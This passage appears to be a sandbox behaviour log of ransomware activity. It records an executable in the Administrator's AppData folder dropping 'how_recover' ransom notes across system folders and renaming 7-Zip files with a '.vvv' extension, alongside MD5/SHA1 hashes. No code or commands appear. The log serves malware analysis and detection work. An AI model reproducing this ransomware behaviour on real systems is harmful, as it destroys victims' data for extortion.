  4312. C:\MSOCache\All Users\{90150000-00E1-0409-1000-0000000FF1CE}-C\how_recover+sia.txt
  4313.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  4314.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  4315.     328     2639
  4316. File   
  4317. Created
  4318.    
  4319. C:\MSOCache\All Users\{90150000-00E1-0409-1000-0000000FF1CE}-C\how_recover+sia.html
  4320.     328      
  4321. File   
  4322. Close
  4323.    
  4324. C:\MSOCache\All Users\{90150000-00E1-0409-1000-0000000FF1CE}-C\how_recover+sia.html
  4325.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  4326.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  4327.     328     9372
  4328. File   
  4329. Created
  4330.    
  4331. C:\MSOCache\All Users\{90150000-00E2-0409-1000-0000000FF1CE}-C\how_recover+sia.txt
  4332.     328      
  4333. File   
  4334. Close
  4335.    
  4336. C:\MSOCache\All Users\{90150000-00E2-0409-1000-0000000FF1CE}-C\how_recover+sia.txt
  4337.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  4338.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  4339.     328     2639
  4340. File   
  4341. Created
  4342.    
  4343. C:\MSOCache\All Users\{90150000-00E2-0409-1000-0000000FF1CE}-C\how_recover+sia.html
  4344.     328      
  4345. File   
  4346. Close
  4347.    
  4348. C:\MSOCache\All Users\{90150000-00E2-0409-1000-0000000FF1CE}-C\how_recover+sia.html
  4349.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  4350.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  4351.     328     9372
  4352. File   
  4353. Created
  4354.    
  4355. C:\MSOCache\All Users\{90150000-0115-0409-1000-0000000FF1CE}-C\how_recover+sia.txt
  4356.     328      
  4357. File   
  4358. Close
  4359.    
  4360. C:\MSOCache\All Users\{90150000-0115-0409-1000-0000000FF1CE}-C\how_recover+sia.txt
  4361.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  4362.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  4363.     328     2639
  4364. File   
  4365. Created
  4366.    
  4367. C:\MSOCache\All Users\{90150000-0115-0409-1000-0000000FF1CE}-C\how_recover+sia.html
  4368.     328      
  4369. File   
  4370. Close
  4371.    
  4372. C:\MSOCache\All Users\{90150000-0115-0409-1000-0000000FF1CE}-C\how_recover+sia.html
  4373.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  4374.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  4375.     328     9372
  4376. File   
  4377. Created
  4378.    
  4379. C:\MSOCache\All Users\{90150000-0117-0409-1000-0000000FF1CE}-C\Access.en-us\how_recover+sia.txt
  4380.     328      
  4381. File   
  4382. Close
  4383.    
  4384. C:\MSOCache\All Users\{90150000-0117-0409-1000-0000000FF1CE}-C\Access.en-us\how_recover+sia.txt
  4385.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  4386.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  4387.     328     2639
  4388. File   
  4389. Created
  4390.    
  4391. C:\MSOCache\All Users\{90150000-0117-0409-1000-0000000FF1CE}-C\Access.en-us\how_recover+sia.html
  4392.     328      
  4393. File   
  4394. Close
  4395.    
  4396. C:\MSOCache\All Users\{90150000-0117-0409-1000-0000000FF1CE}-C\Access.en-us\how_recover+sia.html
  4397.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  4398.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  4399.     328     9372
  4400. File   
  4401. Created
  4402.    
  4403. C:\MSOCache\All Users\{90150000-0117-0409-1000-0000000FF1CE}-C\how_recover+sia.txt
  4404.     328      
  4405. File   
  4406. Close
  4407.    
  4408. C:\MSOCache\All Users\{90150000-0117-0409-1000-0000000FF1CE}-C\how_recover+sia.txt
  4409.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  4410.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  4411.     328     2639
  4412. File   
  4413. Created
  4414.    
  4415. C:\MSOCache\All Users\{90150000-0117-0409-1000-0000000FF1CE}-C\how_recover+sia.html
  4416.     328      
  4417. File   
  4418. Close
  4419.    
  4420. C:\MSOCache\All Users\{90150000-0117-0409-1000-0000000FF1CE}-C\how_recover+sia.html
  4421.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  4422.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  4423.     328     9372
  4424. File   
  4425. Created
  4426.    
  4427. C:\MSOCache\All Users\{90150000-012B-0409-1000-0000000FF1CE}-C\how_recover+sia.txt
  4428.     328      
  4429. File   
  4430. Close
  4431.    
  4432. C:\MSOCache\All Users\{90150000-012B-0409-1000-0000000FF1CE}-C\how_recover+sia.txt
  4433.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  4434.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  4435.     328     2639
  4436. File   
  4437. Created
  4438.    
  4439. C:\MSOCache\All Users\{90150000-012B-0409-1000-0000000FF1CE}-C\how_recover+sia.html
  4440.     328      
  4441. File   
  4442. Close
  4443.    
  4444. C:\MSOCache\All Users\{90150000-012B-0409-1000-0000000FF1CE}-C\how_recover+sia.html
  4445.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  4446.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  4447.     328     9372
  4448. File   
  4449. Created
  4450.    
  4451. C:\MSOCache\All Users\{91150000-0011-0000-1000-0000000FF1CE}-C\how_recover+sia.txt
  4452.     328      
  4453. File   
  4454. Close
  4455.    
  4456. C:\MSOCache\All Users\{91150000-0011-0000-1000-0000000FF1CE}-C\how_recover+sia.txt
  4457.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  4458.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  4459.     328     2639
  4460. File   
  4461. Created
  4462.    
  4463. C:\MSOCache\All Users\{91150000-0011-0000-1000-0000000FF1CE}-C\how_recover+sia.html
  4464.     328      
  4465. File   
  4466. Close
  4467.    
  4468. C:\MSOCache\All Users\{91150000-0011-0000-1000-0000000FF1CE}-C\how_recover+sia.html
  4469.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  4470.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  4471.     328     9372
  4472. File   
  4473. Created
  4474.    
  4475. C:\MSOCache\All Users\how_recover+sia.txt
  4476.     328      
  4477. File   
  4478. Close
  4479.    
  4480. C:\MSOCache\All Users\how_recover+sia.txt
  4481.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  4482.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  4483.     328     2639
  4484. File   
  4485. Created
  4486.    
  4487. C:\MSOCache\All Users\how_recover+sia.html
  4488.     328      
  4489. File   
  4490. Close
  4491.    
  4492. C:\MSOCache\All Users\how_recover+sia.html
  4493.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  4494.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  4495.     328     9372
  4496. File   
  4497. Created
  4498.    
  4499. C:\MSOCache\how_recover+sia.txt
  4500.     328      
  4501. File   
  4502. Close
  4503.    
  4504. C:\MSOCache\how_recover+sia.txt
  4505.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  4506.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  4507.     328     2639
  4508. File   
  4509. Created
  4510.    
  4511. C:\MSOCache\how_recover+sia.html
  4512.     328      
  4513. File   
  4514. Close
  4515.    
  4516. C:\MSOCache\how_recover+sia.html
  4517.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  4518.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  4519.     328     9372
  4520. File   
  4521. Created
  4522.    
  4523. C:\PerfLogs\Admin\how_recover+sia.txt
  4524.     328      
  4525. File   
  4526. Close
  4527.    
  4528. C:\PerfLogs\Admin\how_recover+sia.txt
  4529.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  4530.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  4531.     328     2639
  4532. File   
  4533. Created
  4534.    
  4535. C:\PerfLogs\Admin\how_recover+sia.html
  4536.     328      
  4537. File   
  4538. Close
  4539.    
  4540. C:\PerfLogs\Admin\how_recover+sia.html
  4541.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  4542.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  4543.     328     9372
  4544. File   
  4545. Created
  4546.    
  4547. C:\PerfLogs\how_recover+sia.txt
  4548.     328      
  4549. File   
  4550. Close
  4551.    
  4552. C:\PerfLogs\how_recover+sia.txt
  4553.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  4554.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  4555.     328     2639
  4556. File   
  4557. Created
  4558.    
  4559. C:\PerfLogs\how_recover+sia.html
  4560.     328      
  4561. File   
  4562. Close
  4563.    
  4564. C:\PerfLogs\how_recover+sia.html
  4565.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  4566.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  4567.     328     9372
  4568. File   
  4569. Created
  4570.    
  4571. C:\Program Files\453ZBtMk\how_recover+sia.txt
  4572.     328      
  4573. File   
  4574. Close
  4575.    
  4576. C:\Program Files\453ZBtMk\how_recover+sia.txt
  4577.  MD5:  dfd795e9766d0000c6b098809bd6eb64
  4578.  SHA1: 27a30f8981fe9229c0b20a1b4e2818fe5516673e
  4579.     328     2639
  4580. File   
  4581. Created
  4582.    
  4583. C:\Program Files\453ZBtMk\how_recover+sia.html
  4584.     328      
  4585. File   
  4586. Close
  4587.    
  4588. C:\Program Files\453ZBtMk\how_recover+sia.html
  4589.  MD5:  cc8771cf3419bf0f5d9086c5e24dbba0
  4590.  SHA1: 597094f82fc2949d527748bf1385e60405437d1d
  4591.     328     9372
  4592. File   
  4593. Open
  4594.    
  4595. C:\Program Files\7-Zip\History.txt
  4596.     328     32400
  4597. File   
  4598. Close
  4599.    
  4600. C:\Program Files\7-Zip\History.txt
  4601.  MD5:  63405c67e90b02265cf63d9566abf590
  4602.  SHA1: 28c7f799054fd5ebda49f2c624e4bb1cd5327315
  4603.     328     32830
  4604. File   
  4605. Rename
  4606.    
  4607. Old Name:   C:\Program Files\7-Zip\History.txt
  4608. New Name:   C:\Program Files\7-Zip\History.txt.vvv
  4609.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  4610.  MD5:  63405c67e90b02265cf63d9566abf590
  4611.  SHA1: 28c7f799054fd5ebda49f2c624e4bb1cd5327315
  4612.     328     32830
  4613. File   
  4614. Open
  4615.    
  4616. C:\Program Files\7-Zip\Lang\af.txt
  4617.     328     10348
  4618. File   
  4619. Close
  4620.    
  4621. C:\Program Files\7-Zip\Lang\af.txt
  4622.  MD5:  807cdaf752ccbf51694d0901a16a9455
  4623.  SHA1: 20e5a8551e246cf8a9850e2242608e9990023f3d
  4624.     328     10766
  4625. File   
  4626. Rename
  4627.    
  4628. Old Name:   C:\Program Files\7-Zip\Lang\af.txt
  4629. New Name:   C:\Program Files\7-Zip\Lang\af.txt.vvv
  4630.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  4631.  MD5:  807cdaf752ccbf51694d0901a16a9455
  4632.  SHA1: 20e5a8551e246cf8a9850e2242608e9990023f3d
  4633.     328     10766
  4634. File   
  4635. Open
  4636.    
  4637. C:\Program Files\7-Zip\Lang\ar.txt
  4638.     328     16900
  4639. File   
  4640. Close
  4641.    
  4642. C:\Program Files\7-Zip\Lang\ar.txt
  4643.  MD5:  565620cfeaa0503f349142c6009e2ca8
  4644.  SHA1: 82b9622fd295774afc11445bb54336d6f14fe31a
  4645.     328     17326
  4646. File   
  4647. Rename
  4648.    
  4649. Old Name:   C:\Program Files\7-Zip\Lang\ar.txt
  4650. New Name:   C:\Program Files\7-Zip\Lang\ar.txt.vvv
  4651.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  4652.  MD5:  565620cfeaa0503f349142c6009e2ca8
  4653.  SHA1: 82b9622fd295774afc11445bb54336d6f14fe31a
  4654.     328     17326
  4655. File   
  4656. Open
  4657.    
  4658. C:\Program Files\7-Zip\Lang\ast.txt
  4659.     328     10640
  4660. File   
  4661. Close
  4662.    
  4663. C:\Program Files\7-Zip\Lang\ast.txt
  4664.  MD5:  aed620c46ebec17c10a234817f40a5ac
  4665.  SHA1: 8e600bd26fcb410b9db4b8ea973edf183c05204e
  4666.     328     11070
  4667. File   
  4668. Rename
  4669.    
  4670. Old Name:   C:\Program Files\7-Zip\Lang\ast.txt
  4671. New Name:   C:\Program Files\7-Zip\Lang\ast.txt.vvv
  4672.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  4673.  MD5:  aed620c46ebec17c10a234817f40a5ac
  4674.  SHA1: 8e600bd26fcb410b9db4b8ea973edf183c05204e
  4675.     328     11070
  4676. File   
  4677. Open
  4678.    
  4679. C:\Program Files\7-Zip\Lang\az.txt
  4680.     328     13824
  4681. File   
  4682. Close
  4683.    
  4684. C:\Program Files\7-Zip\Lang\az.txt
  4685.  MD5:  2481883d534cca041031fbecbfd07533
  4686.  SHA1: 7dd78ef1929f5d07e2bf334a07f849fe656caedb
  4687.     328     14254
  4688. File   
  4689. Rename
  4690.    
  4691. Old Name:   C:\Program Files\7-Zip\Lang\az.txt
  4692. New Name:   C:\Program Files\7-Zip\Lang\az.txt.vvv
  4693.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  4694.  MD5:  2481883d534cca041031fbecbfd07533
  4695.  SHA1: 7dd78ef1929f5d07e2bf334a07f849fe656caedb
  4696.     328     14254
  4697. File   
  4698. Open
  4699.    
  4700. C:\Program Files\7-Zip\Lang\ba.txt
  4701.     328     18160
  4702. File   
  4703. Close
  4704.    
  4705. C:\Program Files\7-Zip\Lang\ba.txt
  4706.  MD5:  0a897f9b7591d3437ad59c5d235d77e4
  4707.  SHA1: a98df1db94abb5fbfc52942bad9643db4cd75470
  4708.     328     18590
  4709. File   
  4710. Rename
  4711.    
  4712. Old Name:   C:\Program Files\7-Zip\Lang\ba.txt
  4713. New Name:   C:\Program Files\7-Zip\Lang\ba.txt.vvv
  4714.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  4715.  MD5:  0a897f9b7591d3437ad59c5d235d77e4
  4716.  SHA1: a98df1db94abb5fbfc52942bad9643db4cd75470
  4717.     328     18590
  4718. File   
  4719. Open
  4720.    
  4721. C:\Program Files\7-Zip\Lang\be.txt
  4722.     328     18850
  4723. File   
  4724. Close
  4725.    
  4726. C:\Program Files\7-Zip\Lang\be.txt
  4727.  MD5:  56b00b91b5406ce811fe3c135ac75a94
  4728.  SHA1: 56e6d94a81ede6df2b6382303fb064fbacc531f6
  4729.     328     19278
  4730. File   
  4731. Rename
  4732.    
  4733. Old Name:   C:\Program Files\7-Zip\Lang\be.txt
  4734. New Name:   C:\Program Files\7-Zip\Lang\be.txt.vvv
  4735.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  4736.  MD5:  56b00b91b5406ce811fe3c135ac75a94
  4737.  SHA1: 56e6d94a81ede6df2b6382303fb064fbacc531f6
  4738.     328     19278
  4739. File   
  4740. Open
  4741.    
  4742. C:\Program Files\7-Zip\Lang\bg.txt
  4743.     328     20580
  4744. File   
  4745. Close
  4746.    
  4747. C:\Program Files\7-Zip\Lang\bg.txt
  4748.  MD5:  66c2d332278461dc1629acb6c9910141
  4749.  SHA1: a0787311b0a2deeca76454cd7d40a4c8f77eb502
  4750.     328     21006
  4751. File   
  4752. Rename
  4753.    
  4754. Old Name:   C:\Program Files\7-Zip\Lang\bg.txt
  4755. New Name:   C:\Program Files\7-Zip\Lang\bg.txt.vvv
  4756.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  4757.  MD5:  66c2d332278461dc1629acb6c9910141
  4758.  SHA1: a0787311b0a2deeca76454cd7d40a4c8f77eb502
  4759.     328     21006
  4760. File   
  4761. Open
  4762.    
  4763. C:\Program Files\7-Zip\Lang\bn.txt
  4764.     328     23005
  4765. File   
  4766. Close
  4767.    
  4768. C:\Program Files\7-Zip\Lang\bn.txt
  4769.  MD5:  4f307b23da16c2777e2d823537d995c8
  4770.  SHA1: d98b8cb613958cc106ac94717b8c7da8e2b74c53
  4771.     328     23422
  4772. File   
  4773. Rename
  4774.    
  4775. Old Name:   C:\Program Files\7-Zip\Lang\bn.txt
  4776. New Name:   C:\Program Files\7-Zip\Lang\bn.txt.vvv
  4777.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  4778.  MD5:  4f307b23da16c2777e2d823537d995c8
  4779.  SHA1: d98b8cb613958cc106ac94717b8c7da8e2b74c53
  4780.     328     23422
  4781. File   
  4782. Open
  4783.    
  4784. C:\Program Files\7-Zip\Lang\br.txt
  4785.     328     10645
  4786. File   
  4787. Close
  4788.    
  4789. C:\Program Files\7-Zip\Lang\br.txt
  4790.  MD5:  9cc229901e84d6399313910cbdf4af33
  4791.  SHA1: de396f16632e941c2986eac09bd82c146b7afeb5
  4792.     328     11070
  4793. File   
  4794. Rename
  4795.    
  4796. Old Name:   C:\Program Files\7-Zip\Lang\br.txt
  4797. New Name:   C:\Program Files\7-Zip\Lang\br.txt.vvv
  4798.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  4799.  MD5:  9cc229901e84d6399313910cbdf4af33
  4800.  SHA1: de396f16632e941c2986eac09bd82c146b7afeb5
  4801.     328     11070
  4802. File   
  4803. Open
  4804.    
  4805. C:\Program Files\7-Zip\Lang\ca.txt
  4806.     328     13798
  4807. File   
  4808. Close
  4809.    
  4810. C:\Program Files\7-Zip\Lang\ca.txt
  4811.  MD5:  a2db5eee356d6a0f052ece13411d32ec
  4812.  SHA1: 63ef84ca1b7b46a3a95b08815f168f670493a00b
  4813.     328     14222
  4814. File   
  4815. Rename
  4816.    
  4817. Old Name:   C:\Program Files\7-Zip\Lang\ca.txt
  4818. New Name:   C:\Program Files\7-Zip\Lang\ca.txt.vvv
  4819.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  4820.  MD5:  a2db5eee356d6a0f052ece13411d32ec
  4821.  SHA1: 63ef84ca1b7b46a3a95b08815f168f670493a00b
  4822.     328     14222
  4823. File   
  4824. Open
  4825.    
  4826. C:\Program Files\7-Zip\Lang\cs.txt
  4827.     328     14109
  4828. File   
  4829. Close
  4830.    
  4831. C:\Program Files\7-Zip\Lang\cs.txt
  4832.  MD5:  bca7a240bd8ce8a920c802cce7e748d9
  4833.  SHA1: fb70cdba397e24832ea7bde3fe581b342b331bd1
  4834.     328     14526
  4835. File   
  4836. Rename
  4837.    
  4838. Old Name:   C:\Program Files\7-Zip\Lang\cs.txt
  4839. New Name:   C:\Program Files\7-Zip\Lang\cs.txt.vvv
  4840.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  4841.  MD5:  bca7a240bd8ce8a920c802cce7e748d9
  4842.  SHA1: fb70cdba397e24832ea7bde3fe581b342b331bd1
  4843.     328     14526
  4844. File   
  4845. Open
  4846.    
  4847. C:\Program Files\7-Zip\Lang\cy.txt
  4848.     328     10645
  4849. File   
  4850. Close
  4851.    
  4852. C:\Program Files\7-Zip\Lang\cy.txt
  4853.  MD5:  fd01ea496f1795ff593606c458206d48
  4854.  SHA1: f12c2090cd2cfa7e68cb652f19a50707ad560737
  4855.     328     11070
  4856. File   
  4857. Rename
  4858.    
  4859. Old Name:   C:\Program Files\7-Zip\Lang\cy.txt
  4860. New Name:   C:\Program Files\7-Zip\Lang\cy.txt.vvv
  4861.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  4862.  MD5:  fd01ea496f1795ff593606c458206d48
  4863.  SHA1: f12c2090cd2cfa7e68cb652f19a50707ad560737
  4864.     328     11070
  4865. File   
  4866. Open
  4867.    
  4868. C:\Program Files\7-Zip\Lang\da.txt
  4869.     328     12946
  4870. File   
  4871. Close
  4872.    
  4873. C:\Program Files\7-Zip\Lang\da.txt
  4874.  MD5:  d7dc348d2ef5b579fb75ff9eaa602078
  4875.  SHA1: ceaab5e2174b1a2264b8147b01db9d5bb5f20c12
  4876.     328     13374
  4877. File   
  4878. Rename
  4879.    
  4880. Old Name:   C:\Program Files\7-Zip\Lang\da.txt
  4881. New Name:   C:\Program Files\7-Zip\Lang\da.txt.vvv
  4882.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  4883.  MD5:  d7dc348d2ef5b579fb75ff9eaa602078
  4884.  SHA1: ceaab5e2174b1a2264b8147b01db9d5bb5f20c12
  4885.     328     13374
  4886. File   
  4887. Open
  4888.    
  4889. C:\Program Files\7-Zip\Lang\de.txt
  4890.     328     14513
  4891. File   
  4892. Close
  4893.    
  4894. C:\Program Files\7-Zip\Lang\de.txt
  4895.  MD5:  ac22c8e8482a9d626f18cef058314244
  4896.  SHA1: 62defd2b824029328446e663313b457cea78051e
  4897.     328     14942
  4898. File   
  4899. Rename
  4900.    
  4901. Old Name:   C:\Program Files\7-Zip\Lang\de.txt
  4902. New Name:   C:\Program Files\7-Zip\Lang\de.txt.vvv
  4903.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  4904.  MD5:  ac22c8e8482a9d626f18cef058314244
  4905.  SHA1: 62defd2b824029328446e663313b457cea78051e
  4906.     328     14942
  4907. File   
  4908. Open
  4909.    
  4910. C:\Program Files\7-Zip\Lang\el.txt
  4911.     328     21536
  4912. File   
  4913. Close
  4914.    
  4915. C:\Program Files\7-Zip\Lang\el.txt
  4916.  MD5:  e0dad4d5ef434c46724b492cc336df0f
  4917.  SHA1: b90eebbf627bf11837b6659c35703ca95bcd630a
  4918.     328     21966
  4919. File   
  4920. Rename
  4921.    
  4922. Old Name:   C:\Program Files\7-Zip\Lang\el.txt
  4923. New Name:   C:\Program Files\7-Zip\Lang\el.txt.vvv
  4924.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  4925.  MD5:  e0dad4d5ef434c46724b492cc336df0f
  4926.  SHA1: b90eebbf627bf11837b6659c35703ca95bcd630a
  4927.     328     21966
  4928. File   
  4929. Open
  4930.    
  4931. C:\Program Files\7-Zip\Lang\eo.txt
  4932.     328     10637
  4933. File   
  4934. Close
  4935.    
  4936. C:\Program Files\7-Zip\Lang\eo.txt
  4937.  MD5:  0a41ef683dfaffe3f744481c1c89e5bd
  4938.  SHA1: c6c48883f47555773acfcdcb57c5ed23286ac34f
  4939.     328     11054
  4940. File   
  4941. Rename
  4942.    
  4943. Old Name:   C:\Program Files\7-Zip\Lang\eo.txt
  4944. New Name:   C:\Program Files\7-Zip\Lang\eo.txt.vvv
  4945.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  4946.  MD5:  0a41ef683dfaffe3f744481c1c89e5bd
  4947.  SHA1: c6c48883f47555773acfcdcb57c5ed23286ac34f
  4948.     328     11054
  4949. File   
  4950. Open
  4951.    
  4952. C:\Program Files\7-Zip\Lang\es.txt
  4953.     328     14521
  4954. File   
  4955. Close
  4956.    
  4957. C:\Program Files\7-Zip\Lang\es.txt
  4958.  MD5:  730328d9e4a24b625368da5a224bb943
  4959.  SHA1: a8005bff89ca6c901034d000f4532c9c7724c795
  4960.     328     14942
  4961. File   
  4962. Rename
  4963.    
  4964. Old Name:   C:\Program Files\7-Zip\Lang\es.txt
  4965. New Name:   C:\Program Files\7-Zip\Lang\es.txt.vvv
  4966.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  4967.  MD5:  730328d9e4a24b625368da5a224bb943
  4968.  SHA1: a8005bff89ca6c901034d000f4532c9c7724c795
  4969.     328     14942
  4970. File   
  4971. Open
  4972.    
  4973. C:\Program Files\7-Zip\Lang\et.txt
  4974.     328     13481
  4975. File   
  4976. Close
  4977.    
  4978. C:\Program Files\7-Zip\Lang\et.txt
  4979.  MD5:  90a89e6e507ce89f5f7d964705ac5b29
  4980.  SHA1: c8269bcd82772caa196c7af18c58737555c39e21
  4981.     328     13902
  4982. File   
  4983. Rename
  4984.    
  4985. Old Name:   C:\Program Files\7-Zip\Lang\et.txt
  4986. New Name:   C:\Program Files\7-Zip\Lang\et.txt.vvv
  4987.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  4988.  MD5:  90a89e6e507ce89f5f7d964705ac5b29
  4989.  SHA1: c8269bcd82772caa196c7af18c58737555c39e21
  4990.     328     13902
  4991. File   
  4992. Open
  4993.    
  4994. C:\Program Files\7-Zip\Lang\eu.txt
  4995.     328     12799
  4996. File   
  4997. Close
  4998.    
  4999. C:\Program Files\7-Zip\Lang\eu.txt
  5000.  MD5:  cca51c87408fa2092b13417a4e6bdb09
  5001.  SHA1: 892ef763e6a3ee87a121eac748f2f7486f5f3dfe
  5002.     328     13214
  5003. File   
  5004. Rename
  5005.    
  5006. Old Name:   C:\Program Files\7-Zip\Lang\eu.txt
  5007. New Name:   C:\Program Files\7-Zip\Lang\eu.txt.vvv
  5008.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5009.  MD5:  cca51c87408fa2092b13417a4e6bdb09
  5010.  SHA1: 892ef763e6a3ee87a121eac748f2f7486f5f3dfe
  5011.     328     13214
  5012. File   
  5013. Open
  5014.    
  5015. C:\Program Files\7-Zip\Lang\ext.txt
  5016.     328     14145
  5017. File   
  5018. Close
  5019.    
  5020. C:\Program Files\7-Zip\Lang\ext.txt
  5021.  MD5:  29f336cbd30a6076b0214710d595a3d2
  5022.  SHA1: 04faf2de1969aac56d3c9852690a6a6bac4d7710
  5023.     328     14574
  5024. File   
  5025. Rename
  5026.    
  5027. Old Name:   C:\Program Files\7-Zip\Lang\ext.txt
  5028. New Name:   C:\Program Files\7-Zip\Lang\ext.txt.vvv
  5029.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5030.  MD5:  29f336cbd30a6076b0214710d595a3d2
  5031.  SHA1: 04faf2de1969aac56d3c9852690a6a6bac4d7710
  5032.     328     14574
  5033. File   
  5034. Open
  5035.    
  5036. C:\Program Files\7-Zip\Lang\fa.txt
  5037.     328     16655
  5038. File   
  5039. Close
  5040.    
  5041. C:\Program Files\7-Zip\Lang\fa.txt
  5042.  MD5:  48cfa62761d20646a6610898de4da689
  5043.  SHA1: 69910f23000460c05afb5ae45756cf03240c5ce9
  5044.     328     17070
  5045. File   
  5046. Rename
  5047.    
  5048. Old Name:   C:\Program Files\7-Zip\Lang\fa.txt
  5049. New Name:   C:\Program Files\7-Zip\Lang\fa.txt.vvv
  5050.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5051.  MD5:  48cfa62761d20646a6610898de4da689
  5052.  SHA1: 69910f23000460c05afb5ae45756cf03240c5ce9
  5053.     328     17070
  5054. File   
  5055. Open
  5056.    
  5057. C:\Program Files\7-Zip\Lang\fi.txt
  5058.     328     14165
  5059. File   
  5060. Close
  5061.    
  5062. C:\Program Files\7-Zip\Lang\fi.txt
  5063.  MD5:  cae2b41f4ac2f1877f420f2cc4542358
  5064.  SHA1: 2ebcc782359b8e486ce14d00e71ee3909f4dd0b6
  5065.     328     14590
  5066. File   
  5067. Rename
  5068.    
  5069. Old Name:   C:\Program Files\7-Zip\Lang\fi.txt
  5070. New Name:   C:\Program Files\7-Zip\Lang\fi.txt.vvv
  5071.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5072.  MD5:  cae2b41f4ac2f1877f420f2cc4542358
  5073.  SHA1: 2ebcc782359b8e486ce14d00e71ee3909f4dd0b6
  5074.     328     14590
  5075. File   
  5076. Open
  5077.    
  5078. C:\Program Files\7-Zip\Lang\fr.txt
  5079.     328     14652
  5080. File   
  5081. Close
  5082.    
  5083. C:\Program Files\7-Zip\Lang\fr.txt
  5084.  MD5:  adcfc47adf294fad8ff2e6f58bf0883b
  5085.  SHA1: 8b3408b96f4df87f4707d914f8a677b11f27fb48
  5086.     328     15070
  5087. File   
  5088. Rename
  5089.    
  5090. Old Name:   C:\Program Files\7-Zip\Lang\fr.txt
  5091. New Name:   C:\Program Files\7-Zip\Lang\fr.txt.vvv
  5092.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5093.  MD5:  adcfc47adf294fad8ff2e6f58bf0883b
  5094.  SHA1: 8b3408b96f4df87f4707d914f8a677b11f27fb48
  5095.     328     15070
  5096. File   
  5097. Open
  5098.    
  5099. C:\Program Files\7-Zip\Lang\fur.txt
  5100.     328     13894
  5101. File   
  5102. Close
  5103.    
  5104. C:\Program Files\7-Zip\Lang\fur.txt
  5105.  MD5:  3135e22cd0db2266a6f8c2d90451385e
  5106.  SHA1: 751687b55911e1c5abc84b2d3d36c195b1353987
  5107.     328     14318
  5108. File   
  5109. Rename
  5110.    
  5111. Old Name:   C:\Program Files\7-Zip\Lang\fur.txt
  5112. New Name:   C:\Program Files\7-Zip\Lang\fur.txt.vvv
  5113.  Imagepath:  C:\Users\Administrator\AppData\Roaming\icwyx-a.exe
  5114.  MD5:  3135e22cd0db2266a6f8c2d90451385e
  5115.  SHA1: 751687b55911e1c5abc84b2d3d36c195b1353987
  5116.     328     14318
  5117. File   
  5118. Open
  5119.    
  5120. C:\Program Files\7-Zip\Lang\fy.txt
  5121.     328     12468
  5122. File   
  5123. Close
  5124.    
